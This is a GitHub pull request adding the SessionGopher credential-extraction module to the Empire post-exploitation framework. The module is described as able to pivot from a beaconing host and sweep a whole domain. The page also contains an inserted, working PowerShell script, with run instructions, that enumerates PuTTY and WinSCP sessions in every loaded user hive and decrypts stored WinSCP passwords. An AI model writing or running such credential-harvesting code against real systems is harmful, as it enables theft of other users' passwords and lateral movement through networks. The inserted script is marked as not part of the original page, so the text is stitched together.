This repository was archived by the owner on Jan 29, 2020. It is now read-only.

SessionGopher: PowerShell RDP, WinSCP, PuTTY, SuperPuTTy, FileZilla, .ppk, .rdp, .sdtid session extractor & password decryptor#502

Merged
rvrsh3ll merged 2 commits into EmpireProject:2.0_beta from Arvanaghi:2.0_beta-SessionGopher
May 8, 2017

Conversation

@Arvanaghi

Quietly digging up saved sessions and passwords for RDP, WinSCP, FileZilla, PuTTY, and SuperPuTTY

SessionGopher is a purely PowerShell tool that finds and decrypts saved session information for remote access tools. It uses WMI so it can be run remotely, and its best use case is finding Unix systems and jump boxes.

It works by querying the HKEY_USERS hive for all users who have logged onto a domain-joined box at some point. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information and passwords. It has a built-in WinSCP password decryptor, and also deobfuscates and extracts FileZilla and SuperPuTTY passwords. When run in Thorough mode, it searches all drives for PuTTY private key files (.ppk) and extracts all relevant private key information, including the key itself, as well as for Remote Desktop (.rdp) and RSA (.sdtid) files.

SessionGopher has remote access built-in using WMI. You can search the entire domain for these artifacts, or an input list you provide it.

Empire Integration

From this Empire module, you can extract all the saved session data from the beaconing host. Or, you can use that host to pivot to another host whose saved sessions and credentials you wish to extract by using the Target argument. Similarly, you can run SessionGopher across the entire domain using AllDomain. SessionGopher will use the security context of the beaconing user to run unless you explicitly provide domain credentials with the u and p flags.

Github: https://github.com/fireeye/SessionGopher
Blog post: Using the Registry to Discover Unix Systems and Jump Boxes

Let me know if there's any question or comments I can address.
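The HKEY_USERS walk and the WinSCP password decoding described in the PR text, as an added PowerShell example that is not part of SessionGopher, Empire or this pull request. It reads only the user hives currently loaded on the local box (SessionGopher performs the same reads through WMI's StdRegProv, which is what lets it target remote hosts); the registry paths and value names are PuTTY's and WinSCP's, the decoding constants are the ones in WinSCP's Security.cpp, and the hex fixture at the end is constructed by hand rather than taken from a real system.

```powershell
# Added example (not code from SessionGopher or Empire). Walks the loaded user
# hives under HKEY_USERS for PuTTY and WinSCP saved sessions and reverses
# WinSCP's stored-password encoding. The fixture at the bottom is constructed.

$WinSCPMagic = 0xA3     # PWALG_SIMPLE_MAGIC in WinSCP's Security.cpp
$WinSCPFlag  = 0xFF     # PWALG_SIMPLE_FLAG: marks the key-prefixed format

function Get-WinSCPNextByte {
    # Consume one hex pair and undo the per-byte transform stored = (~plain) ^ 0xA3.
    param([ref]$Remaining)
    if ($Remaining.Value.Length -lt 2) { return 0 }
    $stored = [Convert]::ToByte($Remaining.Value.Substring(0, 2), 16)
    $Remaining.Value = $Remaining.Value.Substring(2)
    return ((-bnot [int]$stored) -bxor $WinSCPMagic) -band 0xFF
}

function ConvertFrom-WinSCPPassword {
    param(
        [Parameter(Mandatory)][string]$HostName,
        [Parameter(Mandatory)][string]$UserName,
        [Parameter(Mandatory)][string]$EncodedPassword
    )
    $key  = $UserName + $HostName       # WinSCP prefixes the plaintext with UserName+HostName
    $rest = $EncodedPassword.ToUpper()
    $flag = Get-WinSCPNextByte ([ref]$rest)
    if ($flag -eq $WinSCPFlag) {
        [void](Get-WinSCPNextByte ([ref]$rest))   # dummy byte
        $length = Get-WinSCPNextByte ([ref]$rest)
    } else {
        $length = $flag                           # legacy format: first byte is the length
    }
    $shift = Get-WinSCPNextByte ([ref]$rest)
    if ($rest.Length -lt $shift * 2) { return $null }   # truncated or corrupt value
    $rest = $rest.Substring($shift * 2)                 # skip the random filler bytes
    $sb = New-Object System.Text.StringBuilder
    for ($i = 0; $i -lt $length; $i++) {
        [void]$sb.Append([char](Get-WinSCPNextByte ([ref]$rest)))
    }
    $plain = $sb.ToString()
    if ($flag -eq $WinSCPFlag) {
        # Key mismatch: the value was saved for a different user/host pair.
        if (-not $plain.StartsWith($key)) { return $null }
        return $plain.Substring($key.Length)
    }
    return $plain
}

function Get-SavedSessionsFromHive {
    # Only hives loaded right now (logged-on users, or one you 'reg load') are visible.
    foreach ($hive in Get-ChildItem -Path Registry::HKEY_USERS -ErrorAction SilentlyContinue) {
        $sid = $hive.PSChildName
        if ($sid -notmatch '^S-1-5-21-' -or $sid -like '*_Classes') { continue }

        $puttyKey = "Registry::HKEY_USERS\$sid\Software\SimonTatham\PuTTY\Sessions"
        foreach ($s in Get-ChildItem -Path $puttyKey -ErrorAction SilentlyContinue) {
            $p = Get-ItemProperty -Path $s.PSPath
            [pscustomobject]@{
                SID = $sid; Source = 'PuTTY'
                Session  = [uri]::UnescapeDataString($s.PSChildName)
                HostName = $p.HostName; UserName = $p.UserName; Port = $p.PortNumber
                KeyFile  = $p.PublicKeyFile   # a .ppk path worth collecting
                Password = $null              # PuTTY does not store passwords
            }
        }

        $winscpKey = "Registry::HKEY_USERS\$sid\Software\Martin Prikryl\WinSCP 2\Sessions"
        foreach ($s in Get-ChildItem -Path $winscpKey -ErrorAction SilentlyContinue) {
            $p  = Get-ItemProperty -Path $s.PSPath
            $pw = $null
            if ($p.Password -and $p.HostName -and $p.UserName) {
                $pw = ConvertFrom-WinSCPPassword -HostName $p.HostName -UserName $p.UserName -EncodedPassword $p.Password
            }
            [pscustomobject]@{
                SID = $sid; Source = 'WinSCP'
                Session  = [uri]::UnescapeDataString($s.PSChildName)
                HostName = $p.HostName; UserName = $p.UserName; Port = $p.PortNumber
                KeyFile  = $p.PublicKeyFile
                Password = $pw
            }
        }
    }
}

# Constructed fixture, not from any real system: user "root" on host "10.0.0.5",
# flag format, two filler bytes, then the key-prefixed password "Passw0rd!".
$sample = 'A35C495E12342E3333286D6C726C726C72690C3D2F2F2B6C2E387DABCD'
ConvertFrom-WinSCPPassword -HostName '10.0.0.5' -UserName 'root' -EncodedPassword $sample
Get-SavedSessionsFromHive | Format-Table -AutoSize
```

Run it from an elevated prompt; HKEY_USERS only exposes hives that are loaded, so sessions of users who are not logged on need their NTUSER.DAT mounted first, which is the gap SessionGopher's Thorough mode and its WMI path are meant to narrow. A `$null` Password on a WinSCP row means either no password was saved or the stored value's key prefix did not match that session's user/host, which is the check WinSCP itself performs before trusting the decoded string.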

Brandon Arvanaghi added 2 commits May 7, 2017 22:11
@rvrsh3ll rvrsh3ll merged commit b047284 into EmpireProject:2.0_beta May 8, 2017
@rvrsh3ll

rvrsh3ll commented May 8, 2017

Tested working. Great tool and thanks for the PR!
